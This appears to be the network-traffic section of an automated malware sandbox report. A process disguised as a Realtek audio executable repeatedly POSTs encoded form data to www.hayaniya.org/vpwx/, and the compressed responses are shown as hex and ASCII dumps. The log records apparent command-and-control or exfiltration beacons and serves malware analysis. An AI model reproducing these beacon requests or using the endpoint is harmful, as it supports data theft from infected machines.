                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 73 49 46 64 67 6e 4f 33 46 79 49 48 6f 6f 58 5a 41 47 57 6e 50 64 36 34 6e 45 69 4e 59 62 51 62 4b 6a 64 64 62 66 4e 46 59 68 61 55 51 52 45 44 39 38 33 32 4e 43 54 30 4c 52 58 77 64 77 6d 4e 35 30 7a 53 36 34 5a 2f 45 4e 44 63 5a 4a 42 63 4f 47 4e 38 79 6a 62 71 4d 68 53 30 35 55 56 4e 31 74 42 33 36 49 4c 49 2f 66 57 59 35 4f 4d 36 56 68 31 6a 6f 49 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo="}</script></head></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                45192.168.11.2049804192.185.147.100807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.423396111 CET680OUTPOST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 64 58 72 6b 59 6d 79 48 77 62 4a 4f 5a 4f 66 73 6b 4c 64 63 6e 6a 5a 35 6d 78 54 54 4d 56 79 59 45 36 32 7a 4b 32 30 65 4b 53 31 31 54 54 37 55 5a 59 73 2f 35 36 67 58 66 39 65 59 47 32 69 41 50 53 6a 65 4e 6d 71 51 54 6b 35 6b 76 54 2f 68 37 6c 41 56 4f 74 36 59 38 74 58 5a 45 46 6b 78 35 70 2f 65 6f 57 52 70 59 79 72 4a 36 52 71 39 72 76 64 4d 2f 49 31 77 73 34 66 6e 30 5a 38 58 32 50 62 78 61 4d 5a 68 46 66 42 79 48 6d 61 79 5a 5a 48 6b 67 63 43 55 4c 6a 6d 31 57 32 64 37 64 66 77 48 67 37 6b 4c 54 52 54 62 4c 78 4f 73 2f 2f 59 74 65 64 79 77 48 37 53 56 78 67 6d 52 5a 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=dXrkYmyHwbJOZOfskLdcnjZ5mxTTMVyYE62zK20eKS11TT7UZYs/56gXf9eYG2iAPSjeNmqQTk5kvT/h7lAVOt6Y8tXZEFkx5p/eoWRpYyrJ6Rq9rvdM/I1ws4fn0Z8X2PbxaMZhFfByHmayZZHkgcCULjm1W2d7dfwHg7kLTRTbLxOs//YtedywH7SVxgmRZg==
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872312069 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:26 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z]wD8A6l1>jT;~s`uU|f
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872333050 CET1289INData Raw: c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08 bb e3 ab b4 6e b8 90 b8 b7 2f 27 bb ef b0 13 cf 77 da bf a9 6d f6 1e 48 a2 12 c9 0d d5 20 20 82 d9 ee e2 ae 40 df de c3 22 48 26 93 89 fc 44 7d 76 b6 b7 24 38
                                                                                                                                                                                                                                Data Ascii: w7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$Jmx}`$n/[YYW^KCN
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872349977 CET1289INData Raw: 3b 77 ee b8 34 8e 18 9e 1d 18 ba c8 78 8f 86 d9 21 31 57 0f 20 6a 0b 09 4b 1f 18 5c d4 84 4e 51 1c 60 a0 b5 36 1c 10 ea 07 ea c0 68 91 70 2d 02 60 55 50 17 08 b1 04 a6 0e 8c a6 d1 6c 34 07 1b 61 e0 42 51 07 33 84 19 f5 21 0d 35 1b 9b 3d 32 99 f9
                                                                                                                                                                                                                                Data Ascii: ;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg!W\6ML]'LGw\Ac!>E<wg;Vs:H ZY?y8&6p'+?*Re?t}
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872364044 CET1289INData Raw: b2 f7 30 c4 d2 a7 1c b6 d8 dc 20 db 71 b9 41 f6 5a 69 96 39 b6 37 2b 21 03 af 36 13 ce 31 72 04 4b 42 1e d7 f3 d4 ae b2 74 41 49 85 b6 fa 92 48 c4 0a 01 7e d8 59 91 fa 59 ad 46 bb 77 ad da ca d0 b2 b6 11 e0 18 aa b0 5e 52 c8 87 f9 f7 c0 38 c1 72
                                                                                                                                                                                                                                Data Ascii: 0 qAZi97+!61rKBtAIH~YYFw^R8rwUKy==FB*Ua+[/<@Wl0#((5Nu${-kz,(ITHb|m"nD^Z7A.B>m)TU)_-uUm%2bkKj:;/EK1;.w
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872391939 CET1289INData Raw: 0c 73 cf b0 e2 19 e5 9e d1 c2 33 f8 f9 cf 31 95 e2 ef 7f d3 7b ef 37 3b c3 07 2e 8d 23 86 67 13 9c 28 a1 3d d9 85 fb 8d c1 f5 2e bc 54 21 05 59 c5 28 0e b0 24 2e 6a 5e 43 86 11 4b 7c ca 63 6b a9 40 1c c7 44 c5 16 a3 76 ae 0f 84 a7 24 16 21 c9 74
                                                                                                                                                                                                                                Data Ascii: s31{7;.#g(=.T!Y($.j^CK|ck@Dv$!t;6{Vy=l-0,om/F[[;~HLNY+4ZHBRX,mLs~IV.U_Edb(b)c!UbN\9(~f9$
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872394085 CET1289INData Raw: df cc 9f a5 cf 8d fc f9 22 7d 03 bf 4f e7 4f 96 ae f3 f4 75 fa 62 fe 87 cc 9a 7f a3 dd df e6 81 97 f0 38 d7 99 a6 21 09 83 71 22 84 e9 37 d8 77 6c e1 c3 b1 15 e5 4c 00 17 d9 21 5c ac f0 f2 80 48 d3 08 3a 89 44 ac cc f5 68 76 8c 61 73 71 b3 ba bb
                                                                                                                                                                                                                                Data Ascii: "}OOub8!q"7wlL!\H:DhvasqgUx<X8&N&TQ6=h49,#6b%51[B@!x8abU4kEqR@{_$B=(=*}cc"\OBXQxgI9Z,uI|
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872406960 CET777INData Raw: d8 a2 e5 1c 4b b7 5c 1b bb 09 29 4e ec 90 2e d1 e8 d7 d6 d1 8b 73 5d 63 76 e6 80 4b 15 5a b2 32 0e 4b bb e2 5e 98 4b bb 1a af 95 a0 23 58 12 72 63 c5 81 da bd 8a 43 89 68 33 ab b0 36 3d a8 d7 f2 48 bb 67 57 22 1a 23 0a 85 4d 19 31 0d 17 2b 8c b2
                                                                                                                                                                                                                                Data Ascii: K\)N.s]cvKZ2K^K#XrcCh36=HgW"#M1+?$%Qqwin[".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872423887 CET1289INData Raw: 31 66 61 30 0d 0a e0 6e c5 92 b5 e6 d2 de e2 8c 89 a3 a8 28 da 8e 8b d7 e6 96 65 60 e9 51 22 aa f1 16 d6 a6 07 75 ba dd 51 6b e8 1a 1b 3d 17 f7 09 81 5e 46 6a 12 62 25 89 72 02 52 2d d6 b7 40 a1 b0 69 6d 8d 2d 4e 49 dd b0 80 50 3f 50 c8 25 1e 4e
                                                                                                                                                                                                                                Data Ascii: 1fa0n(e`Q"uQk=^Fjb%rR-@im-NIP?P%N44\0,H"21"(HzP8*}cc"\OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJ
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872438908 CET1289INData Raw: 8d d4 22 dc 2b 15 bd b0 af 24 d3 6d 3c e7 f4 7e 07 8f 37 99 5e f5 f3 cd fc f1 fc 29 fc dd a6 80 bb c3 f6 95 f8 6e 57 20 0e 2a da d3 ea d2 e4 e3 c1 1a 59 0b 46 3b 95 43 b4 2a 9d bc d2 86 6f ff 12 e2 be 06 1e ce 33 21 be 02 f6 ce 73 86 80 ae d7 c0
                                                                                                                                                                                                                                Data Ascii: "+$m<~7^)nW *YF;C*o3!sW~ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872453928 CET1289INData Raw: 8c 3f cf 1f 1b f9 f3 71 fe 7d 96 3e bf 35 66 3a fd 41 eb 72 6a 16 18 dd ca d9 fb fa e0 a8 c2 90 53 51 48 af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6
                                                                                                                                                                                                                                Data Ascii: ?q}>5f:ArjSQH:BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997052908 CET1289INData Raw: b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d 03 6d 77 db bd cb a1 c2 fe 9d 12 5d 89 0b 8f 72 d8 76
                                                                                                                                                                                                                                Data Ascii: `7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-;lL?]


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.11.2049805192.185.147.100807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.071538925 CET700OUTPOST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 64 58 72 6b 59 6d 79 48 77 62 4a 4f 49 64 58 73 6d 73 42 63 32 44 5a 36 34 68 54 54 46 31 7a 77 45 36 36 7a 4b 33 41 4f 4a 67 68 31 54 79 4c 55 61 61 49 2f 36 36 67 58 55 64 65 64 62 6d 69 50 50 53 66 57 4e 6d 6d 51 54 6e 46 6b 76 57 37 68 37 53 30 55 50 39 36 61 39 64 58 62 5a 31 6b 78 35 70 2f 65 6f 57 56 44 59 79 6a 4a 36 68 36 39 35 2b 64 4c 6a 59 31 7a 74 34 66 6e 77 5a 39 65 32 50 62 54 61 4e 46 62 46 5a 4e 79 48 6e 71 79 59 4d 72 37 35 73 43 57 45 44 6e 6c 58 31 38 4b 56 72 49 44 32 63 45 55 55 43 66 37 48 48 44 32 69 4e 73 4a 64 4f 75 43 44 4c 72 39 7a 69 6e 4b 45 71 75 43 64 54 35 2f 43 75 64 44 39 30 6c 2f 47 71 62 51 4f 42 45 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=dXrkYmyHwbJOIdXsmsBc2DZ64hTTF1zwE66zK3AOJgh1TyLUaaI/66gXUdedbmiPPSfWNmmQTnFkvW7h7S0UP96a9dXbZ1kx5p/eoWVDYyjJ6h695+dLjY1zt4fnwZ9e2PbTaNFbFZNyHnqyYMr75sCWEDnlX18KVrID2cEUUCf7HHD2iNsJdOuCDLr9zinKEquCdT5/CudD90l/GqbQOBE=
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582056046 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:54:29 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z]wD8A6l1>jT;~s`uU|f
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582078934 CET1289INData Raw: c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08 bb e3 ab b4 6e b8 90 b8 b7 2f 27 bb ef b0 13 cf 77 da bf a9 6d f6 1e 48 a2 12 c9 0d d5 20 20 82 d9 ee e2 ae 40 df de c3 22 48 26 93 89 fc 44 7d 76 b6 b7 24 38
                                                                                                                                                                                                                                Data Ascii: w7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$Jmx}`$n/[YYW^KCN
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582094908 CET1289INData Raw: 3b 77 ee b8 34 8e 18 9e 1d 18 ba c8 78 8f 86 d9 21 31 57 0f 20 6a 0b 09 4b 1f 18 5c d4 84 4e 51 1c 60 a0 b5 36 1c 10 ea 07 ea c0 68 91 70 2d 02 60 55 50 17 08 b1 04 a6 0e 8c a6 d1 6c 34 07 1b 61 e0 42 51 07 33 84 19 f5 21 0d 35 1b 9b 3d 32 99 f9
                                                                                                                                                                                                                                Data Ascii: ;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg!W\6ML]'LGw\Ac!>E<wg;Vs:H ZY?y8&6p'+?*Re?t}
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582109928 CET1289INData Raw: b2 f7 30 c4 d2 a7 1c b6 d8 dc 20 db 71 b9 41 f6 5a 69 96 39 b6 37 2b 21 03 af 36 13 ce 31 72 04 4b 42 1e d7 f3 d4 ae b2 74 41 49 85 b6 fa 92 48 c4 0a 01 7e d8 59 91 fa 59 ad 46 bb 77 ad da ca d0 b2 b6 11 e0 18 aa b0 5e 52 c8 87 f9 f7 c0 38 c1 72
                                                                                                                                                                                                                                Data Ascii: 0 qAZi97+!61rKBtAIH~YYFw^R8rwUKy==FB*Ua+[/<@Wl0#((5Nu${-kz,(ITHb|m"nD^Z7A.B>m)TU)_-uUm%2bkKj:;/EK1;.w
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582124949 CET1289INData Raw: 0c 73 cf b0 e2 19 e5 9e d1 c2 33 f8 f9 cf 31 95 e2 ef 7f d3 7b ef 37 3b c3 07 2e 8d 23 86 67 13 9c 28 a1 3d d9 85 fb 8d c1 f5 2e bc 54 21 05 59 c5 28 0e b0 24 2e 6a 5e 43 86 11 4b 7c ca 63 6b a9 40 1c c7 44 c5 16 a3 76 ae 0f 84 a7 24 16 21 c9 74
                                                                                                                                                                                                                                Data Ascii: s31{7;.#g(=.T!Y($.j^CK|ck@Dv$!t;6{Vy=l-0,om/F[[;~HLNY+4ZHBRX,mLs~IV.U_Edb(b)c!UbN\9(~f9$
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582139969 CET1289INData Raw: df cc 9f a5 cf 8d fc f9 22 7d 03 bf 4f e7 4f 96 ae f3 f4 75 fa 62 fe 87 cc 9a 7f a3 dd df e6 81 97 f0 38 d7 99 a6 21 09 83 71 22 84 e9 37 d8 77 6c e1 c3 b1 15 e5 4c 00 17 d9 21 5c ac f0 f2 80 48 d3 08 3a 89 44 ac cc f5 68 76 8c 61 73 71 b3 ba bb
                                                                                                                                                                                                                                Data Ascii: "}OOub8!q"7wlL!\H:DhvasqgUx<X8&N&TQ6=h49,#6b%51[B@!x8abU4kEqR@{_$B=(=*}cc"\OBXQxgI9Z,uI|
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582151890 CET777INData Raw: d8 a2 e5 1c 4b b7 5c 1b bb 09 29 4e ec 90 2e d1 e8 d7 d6 d1 8b 73 5d 63 76 e6 80 4b 15 5a b2 32 0e 4b bb e2 5e 98 4b bb 1a af 95 a0 23 58 12 72 63 c5 81 da bd 8a 43 89 68 33 ab b0 36 3d a8 d7 f2 48 bb 67 57 22 1a 23 0a 85 4d 19 31 0d 17 2b 8c b2
                                                                                                                                                                                                                                Data Ascii: K\)N.s]cvKZ2K^K#XrcCh36=HgW"#M1+?$%Qqwin[".q+~_R5!"u7(QGM1]YT5\BDWr"Ks|s)8|GU$\Ivn"5jqI"
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582168102 CET1289INData Raw: 31 66 61 30 0d 0a e0 6e c5 92 b5 e6 d2 de e2 8c 89 a3 a8 28 da 8e 8b d7 e6 96 65 60 e9 51 22 aa f1 16 d6 a6 07 75 ba dd 51 6b e8 1a 1b 3d 17 f7 09 81 5e 46 6a 12 62 25 89 72 02 52 2d d6 b7 40 a1 b0 69 6d 8d 2d 4e 49 dd b0 80 50 3f 50 c8 25 1e 4e
                                                                                                                                                                                                                                Data Ascii: 1fa0n(e`Q"uQk=^Fjb%rR-@im-NIP?P%N44\0,H"21"(HzP8*}cc"\OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJ
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582367897 CET1289INData Raw: 8d d4 22 dc 2b 15 bd b0 af 24 d3 6d 3c e7 f4 7e 07 8f 37 99 5e f5 f3 cd fc f1 fc 29 fc dd a6 80 bb c3 f6 95 f8 6e 57 20 0e 2a da d3 ea d2 e4 e3 c1 1a 59 0b 46 3b 95 43 b4 2a 9d bc d2 86 6f ff 12 e2 be 06 1e ce 33 21 be 02 f6 ce 73 86 80 ae d7 c0
                                                                                                                                                                                                                                Data Ascii: "+$m<~7^)nW *YF;C*o3!sW~ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582389116 CET1289INData Raw: 8c 3f cf 1f 1b f9 f3 71 fe 7d 96 3e bf 35 66 3a fd 41 eb 72 6a 16 18 dd ca d9 fb fa e0 a8 c2 90 53 51 48 af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6
                                                                                                                                                                                                                                Data Ascii: ?q}>5f:ArjSQH:BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706891060 CET1289INData Raw: b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d 03 6d 77 db bd cb a1 c2 fe 9d 12 5d 89 0b 8f 72 d8 76
                                                                                                                                                                                                                                Data Ascii: `7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-;lL?]


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.11.2049806192.185.147.100807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727149010 CET2578OUTPOST /vpwx/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.hayaniya.org
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.hayaniya.org
                                                                                                                                                                                                                                Referer: http://www.hayaniya.org/vpwx/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
